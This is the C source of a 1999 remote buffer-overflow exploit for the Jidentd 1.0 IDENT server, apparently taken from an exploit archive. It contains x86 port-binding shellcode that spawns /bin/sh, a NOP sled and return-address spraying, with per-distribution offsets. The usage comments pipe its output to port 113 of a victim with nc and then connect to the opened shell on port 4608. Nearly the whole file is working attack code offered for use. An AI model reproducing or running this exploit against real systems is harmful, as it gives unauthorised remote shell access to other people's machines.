Jidentd 1.0 IDENT server remote exploit. Tested under Slackware 3.6 and 4.0, Debian 2.1, Redhat 4.1, 5.0, 5.1 and 5.2.
9bb5daf2edcaff51a09bef34d3664fe3ceeb2793878de4d7c1634fcf15c2396a
/*
* Jidentd 1.0 IDENT server remote sploit
* funkySh 03/08/99(v.2) / port-bind shellcode by tekneeq
* run: jidex [offset] | nc victim 113
* telnet victim 4608
*
* tested under:
* Slackware 3.6, 4.0 offset = 0
* Debian 2.1 offset =
* Redhat 5.1, 5.2 offset = 700
* 5.0 offset = 800
* 4.1 offset =
*
* also try to modify ALIGN if not work.
*/
#include <stdio.h>
char code[] =
"\x31\xdb\xb0\x1b\xcd\x80\xeb\x40\x5e\x31\xc0\x40\x89\x46\x04"
"\x89\xc3\x40\x89\x06\xb0\x06\x89\x46\x08\xb0\x66\x8d\x0e\xcd"
"\x80\x89\x06\x8d\x4e\x0c\x89\x4e\x04\x31\xc0\x89\x46\x10\x89"
"\x46\x14\xb0\x02\x89\xc3\x89\x46\x0c\xb0\x12\x89\x46\x0e\xb0"
"\x10\x89\x46\x08\xb0\x66\x8d\x0e\xcd\x80\xeb\x02\xeb\x62\x31"
"\xdb\x89\xd8\xb3\x01\x89\x5e\x04\xb3\x04\x8d\x0e\xb0\x66\xcd"
"\x80\x31\xc0\x8d\x4e\x0c\x89\x4e\x04\x8d\x4e\x1c\x89\x4e\x08"
"\x8d\x0e\xb3\x05\xb0\x66\xcd\x80\x89\xc3\x31\xc0\x89\xc1\xb0"
"\x3f\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80"
"\x89\xf2\x83\xc2\x20\x89\xd6\x89\x76\x08\x31\xc0\x88\x46\x07"
"\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\x31\xdb\x89\xd8\x40\xcd\x80\xe8\x57\xff\xff\xff\x6a\x75\x6e"
"\x6b\x6a\x75\x6e\x6b\x6a\x75\x6e\x6b\x6a\x75\x6e\x6b\x6a\x75"
"\x6e\x6b\x6a\x75\x6e\x6b\x6a\x75\x6e\x6b\x6a\x75\x6e\x6b/bin/sh";
#define BUFFER 1100
#define NOP 0x90
#define RET_ADDR 0xbffff704
#define ALIGN 0
char buf[BUFFER];
void main(int argc, char * argv[])
{
int i, offset = 0;
long address;
if(argc > 1) offset = atoi(argv[1]);
address = RET_ADDR + offset;
memset(buf,NOP,BUFFER);
memcpy(buf+700,code,strlen(code));
for(i=923+ALIGN;i<BUFFER-2;i+=4)
*(int *)&buf[i]=address;
buf[BUFFER - 1] = 0;
printf("%s", buf);
}